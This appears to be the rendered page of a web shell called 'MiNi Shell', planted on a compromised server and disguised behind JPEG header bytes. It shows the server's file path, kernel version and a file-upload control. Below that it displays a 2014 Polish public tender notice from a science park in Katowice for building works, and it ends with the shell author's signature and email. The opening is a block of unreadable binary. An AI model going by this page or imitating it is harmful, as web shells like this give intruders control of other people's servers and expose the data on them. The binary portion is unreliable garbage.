JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140110/6001-N-2014.html

<p class="kh_header"><b>Katowice: Wybór Wykonawcy, któremu zostanie powierzona kontynuacja robót w budynku nr 8 posadowionym w
Katowicach przy ul. Ligockiej 103 tj.: 1) dokończenie wykonania instalacji elektrycznych i niskoprądowych; 2)
dokończenie robót wykończeniowych na nowych kondygnacjach i w laboratoriach; 3) wykonanie ogrodzenia
terenu i chodnika; 4) zaprojektowanie i wykonanie oświetlenia zewnętrznego od ul. Szadoka/ Z-1/I/2014/PNT</b><br>
<b>Numer ogłoszenia: 6001 - 2014; data zamieszczenia: 10.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Park Naukowo-Technologiczny "Euro-Centrum" Sp. z o.o. , ul. Ligocka 103, 40-568 Katowice, woj. śląskie, tel. 32 78 34 300, faks 32 250 47 85.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.euro-centrum.com.pl/przetargi/pnt/1</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór Wykonawcy, któremu zostanie powierzona kontynuacja robót w budynku nr 8 posadowionym w
Katowicach przy ul. Ligockiej 103 tj.: 1) dokończenie wykonania instalacji elektrycznych i niskoprądowych; 2)
dokończenie robót wykończeniowych na nowych kondygnacjach i w laboratoriach; 3) wykonanie ogrodzenia
terenu i chodnika; 4) zaprojektowanie i wykonanie oświetlenia zewnętrznego od ul. Szadoka/ Z-1/I/2014/PNT.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi kontynuacja robót w budynku nr 8 posadowionym w Katowicach przy ul. Ligockiej 103 tj. obejmujących: dokończenie wykonania instalacji elektrycznych i niskoprądowych, dokończenie robót wykończeniowych na nowych kondygnacjach i w laboratoriach, wykonanie ogrodzenia i chodnika oraz zaprojektowanie i wykonanie oświetlenia na podstawie: 
1. Projekt instalacji elektrycznych i niskoprądowych dla podziału pomieszczeń  na segmencie C II piętro;
2. Projekt instalacji elektrycznych i niskoprądowych dla podziału pomieszczeń  na segmencie C I piętro nowa kondygnacja; 
3. Projekt instalacji elektrycznych i niskoprądowych  dla podziału pomieszczeń  4. Przedmiar robót do wykonania w zakresie robót wykończeniowych;
5. Przedmiar i opis ogrodzenia stałego terenu  działek 12/23, 8,9/2 i 10 oraz przedmiar chodnika od nowopowstałego parkingu do budynku od strony północnej rys. Z2;
6. Opracowanego projekt i przedmiaru oświetlenia terenu od ul. Szadoka.

Jednocześnie zamawiający dopuszcza składanie ofert częściowych w poniższych zakresach:
Zakres nr 1 - dokończenie wykonania instalacji elektrycznych, niskoprądowych i BMS, zgodnie z aneksem  do projektu  wewnętrznych instalacji elektrycznych i niskoprądowych  przedmiarami robót:
a) dla pomieszczeń biurowych na II kondygnacji, segment C - według nowego podziału,
b) dla nowopowstałej kondygnacji, segmentu C,
c) dla III kondygnacji, segment A - według nowego podziału.
d dostawa i montaż pasków LED do podświetlenia elementów dekoracyjnych BRAM;

Zakres nr 2 -  dokończenie robót wykończeniowych na  nowopowstałych powierzchniach biurowych i w Laboratoriach:
a) w zakresie tynków cementowo-wapiennych na ścianach i stropach,
b) w zakresie tynków mineralne na ścianach żelbetowych
c) w zakresie zabudowy gk jednostronne z płyty gk  12,5mm klejona na ściany
d) w zakresie gładzi gipsowych na policzkach biegów schodowych
e) w zakresie zabudów GK na instalacjach,
f) w zakresie tynków  dekoracyjnych na korytarzach,
g) w zakresie zabudów kratek rewizyjnych dla zaworów na instalacjach w sufitach, 
h) w zakresie zabudowy  z blachy stalowej elementów stropu przy  aneksach kuchennych,
i) w zakresie malowania; 

Zakres nr 3 - wykonanie ogrodzenia stałego terenu działek 12/23, 8, 9/2, 10 oraz chodnika od nowopowstałego parkingu do budynku od strony północnej:
a) w zakresie dostawy wraz z montażem przęseł ogrodzeniowych i słupków stalowych  zgodnie  z projektowaną trasą wg rys. R1 typ przęseł np. apaprojektsystem standard kolor, grafit lub ciemna zieleń, wysokość 1,55 m; szerokość przęsła 2,50 m; rys. Z2
b) w zakresie wykonania chodnika zgodnie z rys. Z5/ z kostki brukowej. 

Zakres nr 4 -zaprojektowanie i wykonanie oświetlenia terenu od strony ul. Szadoka wg. wytycznych Zamawiającego stanowiących  załącznik do projektu zagospodarowania rys. R2
a) wykonanie linii zasilającej z rozdzielni n/N w budynku do miejsc parkingowych  od strony ul. Szadoka i ul. Załęskiej;
b) montaż 9 szt. słupów oświetleniowych wraz z lampami energooszczędnymi.
 
Każdy Wykonawca będzie również obowiązany do:
1) wykonania podłączenia nowych instalacji na segmencie C i A do istniejących  instalacji elektrycznych - dla zakresu nr 1;
2) wykonania robót przygotowawczych; 
3) wykonywania wpisów do dziennika budowy prowadzonego przez Kierownika Budowy;
4) uzupełnienia tynków i naprawa ścian przy wykonywaniu robót - dla zakresów 1-2 i 4;
5) uzupełnienie malowania w przypadku uszkodzenia ścian; 
6) kontrola jakości;
7) przeprowadzenia odbiorów;
8) uporządkowania terenu i obiektu po wykonaniu prac (posprzątanie, odkurzenie i umycie);
9) zabezpieczenie zaplecza budowy oraz pomieszczeń sanitarnych na czas realizacji robót na potrzeby Wykonawcy; 
10) po zakończeniu robót - likwidacji zaplecza i uporządkowanie terenu;
11) współpracy z Zamawiającym na etapie uzyskiwania przez niego pozwolenia na użytkowanie, w tym do niezwłocznego przedstawienia dokumentów żądanych przez Zamawiającego, a niezbędnych do uzyskania pozwolenia;
12) ponoszenie kosztów zużycia energii elektrycznej i wody proporcjonalnie wg rozliczenia Kierownika Budowy na podstawie kwoty netto przerobu razy współczynnik 0,007 promila. Wykonawca zobowiązany  będzie do zawarcia odrębnej umowy na korzystanie z mediów: woda i odbiór ścieków oraz energia elektryczna z Parkiem Naukowo - Technologicznym EURO-CENTRUM Sp. z o.o. Pkt. 3.3.12 nie dotyczy zakresu nr 3 niniejszego postępowania;
13) współpracy z wyznaczonymi przez Zamawiającego koordynatorami/ koordynatorem robót.

Zamawiający informuje, że po podziałach geodezyjnych uległo zmianie oznaczenie działek, na których inwestycja będzie prowadzona: aktualnie są to działki nr 12/23 i nr 8, 9/2 ,10.

Zamawiający dysponuje pozwoleniem na użytkowanie budynku biurowo - usługowego nr 8 (z wyłączeniem doprojektowanej przestrzeni biurowej segmentów A i C oraz pomieszczeń Data Center i laboratoriów w segmencie C)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.31.50-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki w zakresie wiedzy i doświadczenia dla Wykonawcy, który złoży ofertę na wykonanie całości przedmiotu zamówienia obejmują wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej łącznie:
1) jednej instalacji elektrycznej wraz z instalacją niskoprądową w budynku biurowo - usługowym lub użyteczności publicznej o wartości co najmniej 60.000,00 zł;
2) wykonanie w jednym budynku biurowo - usługowym robót budowlano - wykończeniowych w zakresie łącznie: tynków cementowo-wapiennych lub tynków mineralnych, tynków dekoracyjnych, gładzi gipsowych,  ścianek i zabudów gk oraz malowania o wartości łącznej co najmniej 60.000 zł; 
3) jednej dostawy (wraz z montażem) ogrodzenia oraz wykonania chodnika z kostki brukowej o wartości łącznej co najmniej 30.000 zł; 
4) jednej dostawy wraz z montażem oświetlenia terenu o wartości co najmniej 20.000 zł. 

Warunki w zakresie wiedzy i doświadczenia dla Wykonawcy, który złoży ofertę częściową obejmują wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
1) dla zakresu nr 1 - jednej instalacji elektrycznej wraz z instalacją niskoprądową w budynku biurowo - usługowym lub użyteczności publicznej o wartości co najmniej 60.000,00 zł;
2) dla zakresu nr 2 - wykonanie w jednym budynku biurowo - usługowym robót budowlano - wykończeniowych w zakresie łącznie: tynków cementowo-wapiennych lub tynków mineralnych, tynków dekoracyjnych, gładzi gipsowych,  ścianek i zabudów gk oraz malowania o wartości łącznej co najmniej 60.000 zł;
3) dla zakresu nr 3 - jednej dostawy (wraz z montażem) ogrodzenia oraz wykonania chodnika z kostki brukowej o wartości łącznej co najmniej 30.000 zł;
4) dla zakresu nr 4 - jednej dostawy wraz z montażem oświetlenia terenu o wartości co najmniej 20.000 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki w zakresie dysponowania osobami zdolnymi do wykonania zamówienia dla Wykonawcy, który złoży ofertę na wykonanie całości przedmiotu zamówienia  obejmują dysponowanie co najmniej:
1) jedną osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych;
2) jedną osobą posiadającą uprawnienia budowlane w specjalności ogólnobudowlanej. 

Warunki w zakresie dysponowania osobami zdolnymi do wykonania zamówienia dla Wykonawcy, który złoży ofertę częściową obejmują dysponowanie co najmniej:
1) dla zakresu nr 1 - jedną osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych;
2) dla zakresu nr 2 - jedną osobą posiadającą uprawnienia budowlane w specjalności ogólnobudowlanej;
3) dla zakresu nr 3 - jedną osobą posiadającą uprawnienia budowlane w specjalności ogólnobudowlanej;
4) dla zakresu nr 4 - jedną osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki w zakresie sytuacji ekonomicznej i finansowej dla Wykonawcy, który złoży ofertę na wykonanie całości przedmiotu zamówienia obejmują posiadanie ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej co najmniej na kwotę 150.000,00 zł.

Warunki w zakresie sytuacji ekonomicznej i finansowej dla Wykonawcy, który złoży ofertę częściową obejmują posiadanie ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej co najmniej na kwotę:	dla zakresu nr 1 - 100.000,00 zł;
	dla zakresu nr 2 -  50.000,00 zł;
	dla zakresu nr 3 -  30.000,00 zł;
        dla zakresu nr 4 -  30.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.euro-centrum.com.pl/przetargi/pnt/1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Ligocka 103
40-568 Katowice
budynek nr 3
sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2014 godzina 12:00, miejsce: ul. Ligocka 103
40-568 Katowice
budynek nr 3
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 90 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie udzielane jest w związku z Projektem pod nazwą Utworzenie Parku Naukowo-Technologicznego
Euro-Centrum - rozwój i zastosowanie nowych technologii w obszarze poszanowania energii i jej odnawialnych
źródeł; realizowanym w ramach Osi Priorytetowej 5: Dyfuzja innowacji;
Działanie 5.3: Wspieranie Ośrodków Innowacyjności Programu Operacyjnego Innowacyjna Gospodarka;
finansowanym ze środków Unii Europejskiej oraz środków budżetu Państwa; w związku z umową o udzielenie
wsparcia z dnia 8 października 2010 r. o nr POIG.05.03.00-00-010/10-04.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 1 - dokończenie wykonania instalacji elektrycznych, niskoprądowych i BMS, zgodnie z aneksem  do projektu  wewnętrznych instalacji elektrycznych i niskoprądowych  przedmiarami robót:
a) dla pomieszczeń biurowych na II kondygnacji, segment C - według nowego podziału,
b) dla nowopowstałej kondygnacji, segmentu C,
c) dla III kondygnacji, segment A - według nowego podziału.
d) dostawa i montaż pasków LED do podświetlenia elementów dekoracyjnych BRAM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 2 -  dokończenie robót wykończeniowych na  nowopowstałych powierzchniach biurowych i w Laboratoriach:
a) w zakresie tynków cementowo-wapiennych na ścianach i stropach,
b) w zakresie tynków mineralne na ścianach żelbetowych
c) w zakresie zabudowy gk jednostronne z płyty gk  12,5mm klejona na ściany
d) w zakresie gładzi gipsowych na policzkach biegów schodowych
e) w zakresie zabudów GK na instalacjach,
f) w zakresie tynków  dekoracyjnych na korytarzach,
g) w zakresie zabudów kratek rewizyjnych dla zaworów na instalacjach w sufitach, 
h) w zakresie zabudowy  z blachy stalowej elementów stropu przy  aneksach kuchennych,
i) w zakresie malowania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakres nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 3 - wykonanie ogrodzenia stałego terenu działek 12/23, 8, 9/2, 10 oraz chodnika od nowopowstałego parkingu do budynku od strony północnej:
a) w zakresie dostawy wraz z montażem przęseł ogrodzeniowych i słupków stalowych  zgodnie  z projektowaną trasą wg rys. R1 typ przęseł np. apaprojektsystem standard kolor, grafit lub ciemna zieleń, wysokość 1,55 m; szerokość przęsła 2,50 m; rys. Z2
b) w zakresie wykonania chodnika zgodnie z rys. Z5/ z kostki brukowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.95.33.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakres nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 4 -zaprojektowanie i wykonanie oświetlenia terenu od strony ul. Szadoka wg. wytycznych Zamawiającego stanowiących  załącznik do projektu zagospodarowania rys. R2
a) wykonanie linii zasilającej z rozdzielni n/N w budynku do miejsc parkingowych  od strony ul. Szadoka i ul. Załęskiej;
b) montaż 9 szt. słupów oświetleniowych wraz z lampami energooszczędnymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.52.72.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com